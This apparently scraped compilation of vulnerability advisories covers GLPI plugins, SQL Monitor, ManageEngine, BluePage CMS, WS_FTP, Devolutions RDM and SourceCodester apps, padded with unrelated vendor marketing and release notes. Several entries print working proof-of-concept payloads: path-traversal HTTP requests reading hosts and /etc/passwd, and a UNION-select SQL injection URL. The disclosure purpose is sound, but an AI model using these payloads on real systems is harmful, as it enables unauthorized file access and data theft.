GLPI Glpiinventory versions 1.0.1 and below suffer from a local file inclusion vulnerability.

    # ADVISORY INFORMATION# Exploit Title: GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion  # Date of found: 11 Jun 2022# Application: GLPI Glpiinventory <= 1.0.1# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/glpi-project/glpi-inventory-plugin# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE: CVE-2022-31062# PoCPOST /marketplace/glpiinventory/b/deploy/index.php?action=getFilePart&file=../../\\..\\..\\..\\..\\System32\\drivers\\etc\\hosts&version=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

GLPI Glpiinventory 1.0.1 Local File Inclusion

GLPI Manageentities versions prior to 4.0.2 suffer from a local file inclusion vulnerability.

    # ADVISORY INFORMATION# Exploit Title: GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin# Date of found: 11 Jun 2022# Application: GLPI Manageentities < 4.0.2# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/manageentities# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE : CVE-2022-34127# PoCGET /marketplace/manageentities/inc/cri.class.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

GLPI Manageentities Local File Inclusion

SQL Monitor version 12.1.31.893 suffers from a cross site scripting vulnerability.

    # Exploit Title: SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS) # Date: [12/21/2022 02:07:23 AM UTC]# Exploit Author: [geeklinuxman@gmail.com]# Vendor Homepage: [https://www.red-gate.com/]# Software Link: [https://www.red-gate.com/products/dba/sql-monitor/]# Version: [SQL Monitor 12.1.31.893]# Tested on: [Windows OS]# CVE : [CVE-2022-47870] [Description] Cross Site Scripting (XSS) in the web SQL monitor login page in Redgate SQL Monitor 12.1.31.893 allows remote attackers to inject arbitrary web Script or HTML via the returnUrl parameter. [Affected Component] affected returnUrl inhttps://sqlmonitor.*.com/Account/Login?returnUrl=&hasAttemptedCookie=True affected A tag under span with "redirect-timeout" id value [CVE Impact] disclosure of the user's session cookie, allowing an attacker tohijack the user's session and take over the account. [Attack Vectors] to exploit the vulnerability, someone must click on the malicious AHTML tag under span with "redirect-timeout" id value [Vendor] http://redgate.com http://sqlmonitor.com https://sqlmonitor.

SQL Monitor 12.1.31.893 Cross Site Scripting

ManageEngine Access Manager Plus version 4.3.0 suffers from a path traversal vulnerability.

    ## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal## Author: nu11secur1ty## Date: 11.22.2023## Vendor: https://www.manageengine.com/## Software: https://www.manageengine.com/privileged-session-management/download.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309)## Description:The `pmpcc` cookie is vulnerable to path traversal attacks, enablingread access to arbitrary files on the server.The testing payload..././..././..././..././..././..././..././..././..././..././etc/passwdwas submitted in the pmpcc cookie.The requested file was returned in the application's response.The attacker easy can see all the JS structures of the server and canperform very dangerous actions.## STATUS: HIGH Vulnerability[+] Exploits:```GETGET /amp/webapi/?requestType=GET_AMP_JS_VALUES HTTP/1.1Host: localhost:9292Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: pmpcc=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd;_zcsr_tmp=41143b42-8ff3-4fb0-8b30-688f63f9bf9a;JSESSIONID=2D2DB63E708680CBC717A8A165CE1D6E;JSESSIONIDSSO=314212F36F55D2CE1E7A76F98800E194Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Mobile: ?0X-Requested-With: XMLHttpRequestSec-CH-UA-Platform: WindowsReferer: https://localhost:9292/AMPHome.html```[+] Response:```,'js.pmp.helpCertRequest.subcontent10':'The issued certificate ise-mailed to the user who raises the request, the user who closes therequest and also to those e-mail ids specified at the time of closingthe request.','js.admin.HelpDeskIntegrate.UsernameEgServiceNow':'ServiceNow login username','js.PassTrixMainTab.ActiveDirectory.next_schedule_time':'Nextsynchronization is scheduled to run on','js.agent.csharp_Windows_Agent':'C# Windows Agent','js.PassTrixMainTab.in_sec':'Seconds','godaddy.importcsr.selectfileorpastecontent':'Either select a file orpaste the CSR content.','js.connection.colors':'Colors','js.general.ShareToGroups':'Share resource to user groups','js.connection.mapdisk':'Drives','jsp.admin.Support.User_Forums':'User Forums','js.general.CreateResource.Dns_url_check':'Enter a valid URL . Forcloud services (Rackspace and AWS IAM), the DNS name <br>looks like aURL (ex:  https:\/\/identity.api.rackspacecloud.com\/v2.0)','js.admin.RPA_Integration.About':'PAM360 renders bots that seamlesslyintegrate and perfectly fit into the pre-designed and automatedintegrations of the below listed RPA-powered platforms, to simulatethe routine manual password retrieval from the PAM360 vault.','js.discovery.loadhostnamefromfile':'From file','js.AddListenerDetails.Please_enter_valid_implementation_class':'Pleaseenter a valid Implementation Class','js.general.GroupedResources':'Grouped Resources','js.general.SlaveServer':'This operation is not permitted in Secondary Server.','PROCESSID':'Process Id','js.resources.serviceaccount.SupportedSAccounts.Services_fetched_successfully':'Servicesfetched successfully','assign.defaultdns.nodnsconfigured':'No default DNS available\/enabled','js.commonstr.search':'Search','js.discovery.usercredential_type':'Credential Type','jsp.admin.GeneralSetting.Check_high_availability_status_for':'Checkhigh availability status every <input type=\"text\" class=\"txtbox\"name=\"check_duration\" value=\"{0}\" size=\"5\" maxlength=\"5\"style=\"width:60px\" onkeypress=\"if(event.keyCode==13)return false;\"> minutes.','pki.js.help.entervalidnumber':'Please enter a valid number forNumeric Field Default Value.','js.remoteapp.fetch':'Fetch','js.admin.HighAvailability.configured_successfully':'Configured Successfully','js.generalSettings_searchTerm_Password_reset':'Password Reset,Reason for password reset, disable ticket id, waiting time, wait timefor service account password reset, linux unix password reset','letsencrypt.enter.domainnames':'Enter domain names','js.discovery.resourcetype':'Resource Type','js.HomeTab.UserTab':'Set this tab as default view for \'Users\'','js.report.timeline.todate':'Valid To','js.general_Language_Changed_Successfully':'Language Changed Successfully','js.aws.credentials.label':'AWS Credential','auditpurge.helpnote1':'Enter 0 or leave the field blank to disablepurging of audit trails.','js.general.user.orgn_bulkManage':'Manage Organization','js.rolename.SSH_KEY':'Create\/Add key','js.admin.admin.singledbmultiserver.name':'Application Scaling','lets.encrypt.requestreport':'Let\'s Encrypt Requests Report','js.settings.breach_settings.disable_api':'Disable API Access','js.cmd.delete.not_possible':'Command cannot be deleted as it isalready added to the following command set(s).','js.settings.notification.domaincontent':'Notify if domains areexpiring within','js.aws.searchuser':'--Search UserName--','jsp.admin.GeneralSetting.helpdesk_conf':'Configure the ticketingsystem settings in Admin >> General >> Ticketing System Integration.','js.discovery.port':'Gateway Port','usermanagement.showCertificates':'Show Certificates','js.general.DestinationDirectoryCannotBeEmpty':'Destination directorycannot be empty','js.sshreport.title':'SSH Resource Report','js.encryptionkey.update':'Update','js.aws.regions':'Region','js.settingsTitle1.UserManagement':'User Management','js.passwordPolicy.setRange':'Enforce minimum or maximum password length','js.commonstr.selectResources':'Select Resources','RULENAME':'Rule Name','jsp.admin.usergroups.AddUserGroupDialog.User_Group_added_successfully':'UserGroup added successfully','js.reports.SSHReports.title':'SSH Reports','js.CommonStr.ValueIsLess':'value is less than 2','js.discovery.discoverystatus':'Discovery Status','js.settings.security_settings.Web_Access':'Web Access','js.general.node_name_cannot_be_empty':'Node name cannot be empty','js.deploy.audit':'Deploy Audit','js.agentdiscovery.msca.title':'Microsoft Certificate Authority','jsp.resources.AccessControlView.Choose_the_excluded_groups':'Nominateuser group(s) to exempt from access control.','js.pki.SelectCertificateGroup':'Select Certificate Group(s)','js.admin.HighAvailability.High_Availability_status':'Status','settings.metracker.note0':'Disable ME Tracker if you do not wish toallow ManageEngine to collect product usage details.','SERVICENAME':'Service Name','settings.metracker.note1':'Access Manager Plus server has to berestarted for the changes to take effect.','js.general.NewPinMismatch':'New PIN Mismatch','js.HomeTab.ResourceTab':'Set this tab as default view for \'Resources\'','java.ScheduleUtil.minutes':'minutes','js.admin.sdpop_change.tooltip':'Enabling this option will requireyour users to provide valid Change IDs for the validation of passwordaccess requests and other similar operations. Leaving this optionunchecked requires the users to submit valid Request IDs forvalidation.','js.privacy_settings.title.redact':'Redact','js.admin.passwordrequests.Target_Resource_Selection_Alert':'Only 25resources can be selected','js.aboutpage.websitetitle':'Website','js.customize.NumericField':'Numeric Field','js.please.select.file':'Please select a file to upload.','js.AutoLogon.Remote_connections':'Remote Connections','pki.snmp.port':'Port','java.dashboardutils.TODAY':'TODAY','js.schedule.starttime':'Start Time','js.ssh.keypassphrase':'Passphrase','js.gettingstarted.keystore.step1.one':'Add keys to Access Manager Plus','js.analytics.tab.ueba.msg4':'guide','js.analytics.tab.ueba.msg5':'to complete the integration. For anyfurther questions, please write to us atpam360-support@manageengine.com.','js.reportType.Option7.UserAuditReport':'Audit Report','js.common.csr':'CSR','js.globalsign.reissue.order':'Reissue Order','js.analytics.tab.ueba.msg6':'Build a platform of expected behaviorfor individual users and entities by mapping different user accounts','js.analytics.tab.ueba.msg7':'Verify actionable reports thatsymbolize compromise with details about actual behavior and expectedbehavior.','js.resources.importcredential':'Import Credentials','js.analytics.tab.ueba.msg1':'The Advanced Analytics module forPAM360, offered via ManageEngine Log360 UEBA, analyzes logs fromdifferent sources, including firewalls, routers, workstations,databases, file servers and cloud services. Any deviation from normalbehavior is classified as a time, count, or pattern anomaly. It thengives actionable insight to the IT Administrator with the use of riskscores, anomaly trends, and intuitive reports.','js.analytics.tab.ueba.msg2':'With Log360 UEBA analytics, you can:','js.analytics.tab.ueba.msg3':'To activate Log360 UEBA for your PAM360instance, download Log360 UEBA from the below link and follow theinstructions in this','js.settingsTitle2.MailServer':'Mail Server','jsp.admin.managekey.ChangeKey.Managing_the_PMP_encryption_key':'ManagingAMP Encryption Key','settings.unmappedmails.email':'E-mail Address','amp.connection.connection_type':'Connection Type','js.analytics.tab.ueba.msg8':'Diagnose anomalous user behavior basedon activity time, count, and pattern.','godaddy.contactphone':'Contact Phone','js.general.HelpDeskIntegrate.ClassSameException':'Class name alreadyimplemented. Implement with some other class.','js.analytics.tab.ueba.msg9':'Track abnormal entity behaviors inWindows devices, SQL servers, FTP servers, and network devices such asrouters, firewalls, and switches.','js.rolename.freeCA.acme':'ACME','digicert.label.dcv.cname':'CNAME Token','js.helpcontent.createuser':'User Creation ','pgpkeys.key.details':'Key Information','js.resources.discovery.ResourceDiscoveryStatus.discovery':'Discovery Status','js.HomeTab.TaskAuditView':'Task Audit','pki.js.certs.certGroupsSharedByUserGroups':'Certificate GroupsShared With User Group(s)','js.common.importcsr.format':'(File format should be .csr)','js.notificationpolicy.Submit':'Save','pmp.vct.User_Audit_Configuration':'User Audit Configuration'.........```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309))## Reference:[href](https://portswigger.net/kb/issues/00100300_file-path-traversal)## Proof and Exploit:[href](https://streamable.com/scdzsb)## Time spent`03:00:00`

ManageEngine Access Manager Plus 4.3.0 Path Traversal

BluePage CMS thru 3.9 processes an insufficiently sanitized HTTP Header Cookie value allowing MySQL Injection in the 'users-cookie-settings' token using a Time-based blind SLEEP payload.

 

**...für Kunden**

 **Das Beste aus drei Welten**

BLUEPAGE vereint das Beste aus Blog, Wiki und CMS-Systemen: die Bedienung ist intuitiv und denkbar einfach, Aktualisierungen sind in Windeseile online, die Möglichkeiten zur Administration und Erweiterung sind äußerst umfangreich, Anpassungen sind einfach und schnell integriert und ihr Corporate Design wird dabei immer hundertprozentig umgesetzt! Kaum ein anderes System kann das alles von sich behaupten! BLUEPAGE ist der einfache und schnelle Weg ins Web!

**In Windeseile online!**

Die Inhalte, die Sie mit BLUEPAGE veröffentlichen, sind wirklich mit wenigen Klicks online! Dafür sorgen eine Vielzahl an einfach zu bedienenden Generatoren für elementare Seitenelemente wie Texte und Überschriften, aber auch für umfangreichere Elemente wie Formulare, Tabellen und Seiteninhaltsverzeichnisse, die Sie nie im Stich lassen. So einfach war Content Management noch nie!

**Professionelle Weblösungen, die sich rechnen!**

Wenn Sie Interesse an unseren Angeboten haben, können Sie sich hier über BLUEPAGE informieren. Überzeugen Sie sich von unseren Produkten und unserem Service-Support!

 

 

**Punkte, die für BLUEPAGE sprechen**

spannende Webseiten, weg vom täglichen Einerlei

einfach zu bedienen und robust

ständige Weiterentwicklung

keine laufenden Kosten (nur Ihre normalen Providerkosten)

offen für aktuelle Webtrends

 

 

 

Impressum

 | 

Datenschutzerklärung

 | 

SUCHE

 | 

Sitemap

CVE-2022-38922: BLUEPAGE CMS

Reflected XSS (via AngularJS sandbox escape expressions) exists in Progress Ipswitch WS_FTP Server 8.6.0. This can lead to execution of malicious code and commands on the client due to improper handling of user-provided input. By inputting malicious payloads in the subdirectory searchbar or Add folder filename boxes, it is possible to execute client-side commands. For example, there is Client-Side Template Injection via subFolderPath to the ThinClient/WtmApiService.asmx/GetFileSubTree URI.

**2020.0..0 (8.7.0) Dec 15, 2020**

**2020.0.1 (8.7.1) Aug 30, 2021** **(updated)**

**2020.0.2 (8.7.2) April 22, 2022** **(updated)**

**2020.0.3 (8.7.3) Aug 1, 2022** **(updated)**

The WS\_FTP Server 2020.0.0 (8.7.0) release focused on security vulnerabilities and customer issues to ensure that all security updates were applied to provide users with a secure and quality product.

The following are the main security enhancements and bug fix highlights that were applied to the 2020 release:

*   Database passwords containing special characters are accepted
*   Updated third party components to versions that address known security vulnerabilities.
*   Log viewer filters are applied to exported log data
*   Email addresses of users with a top level domain longer than 5 characters are accepted by WS\_FTP Server
*   The WS\_FTP Server admin log on page renders correctly
*   The installation documentation was updated to include the following important information:  
    _Installing WS\_FTP Server on a domain controller is not supported_

For details of all of the fixed vulnerabilities and issues, see Fixed Issues.

The WS\_FTP Server UI and documentation were rebranded as _Progress WS\_FTP Server._

Support for WS\_FTP Web Server will be deprecated in future releases.

**Fixed Issues in 2020.0.0 (8.7.0)**

The following issues were fixed in WS\_FTP Server 2020.0.0 (8.7.0).

ID

Category

Fixed Issue

6007

Documentation

The installation documentation was updated to include the following important information:  
_Installing WS\_FTP Server on a domain controller is not supported._

6208, 6219, 6222, 6256

Install, SSH, Database

There is support for special characters in database passwords during installation and database configuration.

6301

Security

The AngularJS version used for the WTM and AHT modules was upgraded to version 1.8 to prevent vulnerabilities.

6302

Security

WS\_FTP Server's cookies now have secure and HTTP only attributes.

6325

Security

The prototype.js version used in WS\_FTP Server was upgraded to version 1.7.3 to prevent vulnerabilities.

6342, 6345, 6346

Security,  
WTM

Fixed a directory traversal vulnerability on WS\_FTP Server's WTM interface.

6348

Logging Server

Filters that were applied to the log viewer are now also applied to the .XML export option.

6350

Users

Email addresses of users with a top level domain longer than 5 characters are now accepted by WS\_FTP Server.

6351

Web Admin

The WS\_FTP Server admin log on and home pages now render correctly.

6352

Security,  
Server Admin

Updates were applied to the LogServer login page to protect against cross site scripting (xss).

6356

Security

Error messages were sanitized to prevent the disclosure of potentially sensitive data.

6383

Security

The FTP server (and SSH server) do not reveal the product version to unauthenticated users.

6419

Core

Sessions time out after the specified time, the default is 600 seconds, or when a client disconnects.

**Fixed Issues in 2020.0.1 (8.7.1)**

The following issues were fixed in WS\_FTP Server 2020.0.1 (8.7.1).

ID

Category

Fixed Issue

12244

Database

Fixed an issue which caused an error connecting to SSH/FTP after database migration from PostgreSQL to MSSQL.

12769

Web Transfer Module

Web Transfer Module now successfully opens as part of application pool creation.

**Fixed Issues in 2020.0.2 (8.7.2)**

The following issues were fixed in WS\_FTP Server 2020.0.2 (8.7.2).

ID

Category

Fixed Issue

12339

SRVR/Security

The PostgreSQL version used in WS\_FTP Server was upgraded from version 10.14 to 10.20 to prevent vulnerabilities.

**Fixed Issues in 2020.0.3 (8.7.3)**

The following issues were fixed in WS\_FTP Server 2020.0.3 (8.7.3).

ID

Category

Fixed Issue

6315, 6332, 12240, 15175, 15178, 15179, 15184, 15185

Server, Security

Addressed Cross-Site Request Forgery (CSRF) issues in WS\_FTP Server Administrative interface.

15168, 15181, 15182, 15183, 15186, 15187, 15188

Server, Security

Addressed cross-site scripting (XSS) issues in WS\_FTP Server Administrative interface.

**Known Issues**

This section details known issues and workarounds in all WS\_FTP Server 2020.0 (8.7) releases.

ID

Category

Known Issue Description

15343

Install

A repair installation issue with WS\_FTP Server 2020.0.0 or later, prevents users from upgrading to the next available version.

**Note**: This issue only affects all WS\_FTP Server 2020 releases (2020.0.0, 2020.0.1, and 2020.0.2) where a repair has been applied to an upgraded installation.  
For upgrade information and next steps, see this knowledge base article.

**System Requirements**

These requirements apply to the supporting environment and operating system where you install WS\_FTP Server.

**Software Requirements**

**Supported Operating Systems for WS\_FTP Server**

The Operating Systems are supported for the following WS\_FTP Server configurations:

*   Standalone
*   Failover cluster using Microsoft Clustering Services
*   Failover cluster using Microsoft Network Load Balancing

**Operating System**

*   Windows Server 2019 Standard/Datacenter (standalone only)
*   Windows Server 2016 Standard/Datacenter (standalone only)
*   Windows Server 2012 R2 Standard/Datacenter (standalone only)

**Windows Server Components Activated Automatically**

The WS\_FTP Server installer automatically activates certain components in your Windows Server installation. This is necessary because after installation Windows Server does not turn on non-core operating system components. However, before installing WS\_FTP Server, you should ensure these changes conform to your organization’s security policies.

When you install WS\_FTP Server, the install activates the following Windows Server roles:

*   ISAPI Extensions
*   Windows Authentication
*   ASP

**Supported Web Browsers**

The following browsers are supported for WS\_FTP Server Manager and the Web Transfer and Ad-Hoc Transfer client interfaces:

*   Chrome
*   Mozilla Firefox
*   Microsoft Edge

**Database Platform**

WS\_FTP Server requires one of the database platforms listed in the following table.

The default database platform is PostgreSQL, however during installation, you can select Microsoft SQL Server as your database for configuration data.

*   PostgreSQL 10.20
*   Microsoft SQL Server 2017 Enterprise/Standard
*   Microsoft SQL Server 2016 Enterprise/Standard

**Framework and Accessibility**

WS\_FTP Server requires the Microsoft .NET Framework and other Microsoft packages for scripting and software accessibility. Microsoft .NET Framework 4.6 is included in the installation program.

**Hardware**

**Minimum requirements**

*   4-core server-class CPU (For example: Intel Xeon 4-core 2+GHz)
*   4 GB RAM
*   250 GB or larger free disk space, depending on estimated data to be stored
*   100/1000 MB Ethernet interface (for TCP/IP traffic)

**Ad Hoc Transfer Plug-in Requirements**

The following software must be installed on the machine on which you install the Ad Hoc Transfer Plug-in for Outlook.

*   Microsoft Outlook 2016, 2013, or 2010
*   Supported on Windows Operating Systems only.

**Note**: If you are running the installer live (not doing a silent install), the installer automatically installs the Microsoft Visual Studio redistributable programs. You do not need to download anything from Microsoft. If running a silent install, you must download and install these redistributable programs before running the install. See the Requirements in the Silent Install section.

**Note**: For silent installation instructions for the Ad Hoc Transfer Plug-in for Outlook, see Silent install of the Ad Hoc Transfer Plug-in for Outlook .

**Upgrading**

Upgrading to the latest version of WS\_FTP Server ensures that you have access to the latest features, fixes, security updates, and usability improvements.

WS\_FTP Server 2020.0.0 (8.7.0) supports direct upgrades from WS\_FTP Server 2017 Plus (8.5) and later. For more information, see Upgrade Paths.

**Upgrading information and considerations****Latest features and improvements**

For the most up-to-date information about the latest supported features and improvements, see What's New.

**Hardware Requirements**

Review the current WS\_FTP Server System Requirements.

**Activation code**

The activation code is automatically applied when you run the WS\_FTP Server installer to upgrade.

*   Your upgrade activation code is embedded in the installer file.
*   The activation code is also stored in the section of the Progress Community.
*   The activation code differs from your serial number. The code begins with your serial number and contains an additional eight characters.

**Support for older WS\_FTP Server Versions**

For information about support for previous versions of WS\_FTP Server, see the Product Lifecycle page on the Progress Community website. Customers running EOL or soon to be EOL versions should upgrade to WS\_FTP Server 2020.

**Upgrade Paths**

To upgrade from an earlier version of WS\_FTP Server to WS\_FTP Server 2020, you must download the installer file.

1.  Login to the Progress Community.
2.  Select .
3.  Locate and download your product. Your activation code is embedded in the download file, and is automatically applied during installation.

**Upgrade paths**

WS\_FTP Server 2020 supports direct upgrade installations from the following versions:

*   WS\_FTP Server 2018 (8.6)
*   WS\_FTP Server 2017 Plus (8.5)

**Note**: The upgrade paths are valid only on supported Operating Systems. For more information, see WS\_FTP Server System Requirements.

For detailed installation and configuration instructions, or activating a new or upgraded license, see the WS\_FTP Server Installation and Configuration Guide.

**Note**: If you upgrade from a version earlier than 2020, the default installation folders do not change. For example, the WS\_FTP Server installation folder will be C:\Program Files (x86)\Ipswitch\WS_FTP Server.

**Copyright Notice**

© 2022 Progress Software Corporation and/or one of its subsidiaries or affiliates. All rights reserved.

These materials and all Progress® software products are copyrighted and all rights are reserved by Progress Software Corporation. The information in these materials is subject to change without notice, and Progress Software Corporation assumes no responsibility for any errors that may appear therein. The references in these materials to specific platforms supported are subject to change.

Chef, Chef (and design), Chef Infra, Code Can (and design), Compliance at Velocity, Corticon, DataDirect (and design), DataDirect Cloud, DataDirect Connect, DataDirect Connect64, DataDirect XML Converters, DataDirect XQuery, DataRPM, Defrag This, Deliver More Than Expected, DevReach (and design), Icenium, Inspec, Ipswitch, iMacros, Kendo UI, Kinvey, MessageWay, MOVEit, NativeChat, NativeScript, OpenEdge, Powered by Chef, Powered by Progress, Progress, Progress Software Developers Network, SequeLink, Sitefinity (and Design), Sitefinity, Sitefinity (and design), SpeedScript, Stylus Studio, Stylized Design (Arrow/3D Box logo), Styleized Design (C Chef logo), Stylized Design of Samurai, TeamPulse, Telerik, Telerik (and design), Test Studio, WebSpeed, WhatsConfigured, WhatsConnected, WhatsUp, and WS\_FTP are registered trademarks of Progress Software Corporation or one of its affiliates or subsidiaries in the U.S. and/or other countries.

Analytics360, AppServer, BusinessEdge, Chef Automate, Chef Compliance, Chef Desktop, Chef Habitat, Chef WorkStation, Corticon.js, Corticon Rules, Data Access, DataDirect Autonomous REST Connector, DataDirect Spy, DevCraft, Fiddler, Fiddler Everywhere, FiddlerCap, FiddlerCore, FiddlerScript, Hybrid Data Pipeline, iMail, JustAssembly, JustDecompile, JustMock, KendoReact, NativeScript Sidekick, OpenAccess, PASOE, Pro2, ProDataSet, Progress Results, Progress Software, ProVision, PSE Pro, Push Jobs, SafeSpaceVR, Sitefinity Cloud, Sitefinity CMS, Sitefinity Digital Experience Cloud, Sitefinity Feather, Sitefinity Insight, Sitefinity Thunder, SmartBrowser, SmartComponent, SmartDataBrowser, SmartDataObjects, SmartDataView, SmartDialog, SmartFolder, SmartFrame, SmartObjects, SmartPanel, SmartQuery, SmartViewer, SmartWindow, Supermarket, SupportLink, Unite UX, and WebClient are trademarks or service marks of Progress Software Corporation and/or its subsidiaries or affiliates in the U.S. and other countries. Java is a registered trademark of Oracle and/or its affiliates. Any other marks contained herein may be trademarks of their respective owners.

This document was published on 10 August 2022 at 13:25

CVE-2022-27665: What's New in WS_FTP Server 2020.0.0 (8.7.0)

Information disclosure in the user creation feature of a MSSQL data source in Devolutions Remote Desktop Manager 2023.1.9 and below on Windows allows an attacker with access to the user interface to obtain sensitive information via the error message dialog that displays the password in clear text.

Security & Compliance Reporting a Security Issue Advisories

**Affected Products**

Remote Desktop Manager 2023.1.9 and below

**Change Log**

Initial publication - 2023-03-22

**Product**

Remote Desktop Manager

**Summary**

Remote Desktop Manager MSSQL data source is affected by a vulnerability.

**Password disclosure in the error dialog of the user creation feature of MSSQL.**

**Description**

Information disclosure in the user creation feature of a MSSQL data source in Devolutions Remote Desktop Manager 2023.1.9 and below on Windows allows an attacker with access to the user interface to obtain sensitive information via the error message dialog that displays the password in clear text.

**Remediation and Workarounds**

Upgrade to Remote Desktop Manager 2023.1.10 and higher.

**Severity**

Low - CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N

**Affected Products**

Remote Desktop Manager 2023.1.9 and below.

CVE-2023-1574: DEVO-2023-0006

A vulnerability classified as critical was found in OTCMS 6.0.1. Affected by this vulnerability is an unknown functionality of the file sysCheckFile.php?mudi=sql. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224749 was assigned to this vulnerability.

CVE-2023-1797

A vulnerability was found in SourceCodester Police Crime Record Management System 1.0. It has been classified as critical. This affects an unknown part of the file /officer/assigncase.php of the component GET Parameter Handler. The manipulation of the argument caseid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224745 was assigned to this vulnerability.

CVE-2023-1793

A vulnerability has been found in SourceCodester Simple Task Allocation System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224743.

Permalink

**1** contributor

**Users who have contributed to this file**

The manage\_user.php of the Simple Task Allocation System has a sql injection vulnerability. The id parameter input by the user is not filtered when the code is written, so that the user can carefully construct the url for sql injection

http://127.0.0.1/php-sqlite-task-allocation-system/?page=manage\_user&id=2'union select 1,sqlite\_version(),3,4,5;

 The data can be obtained. Here we take obtaining the database version as an example and other high-risk injection vulnerabilities.

Tag

#sql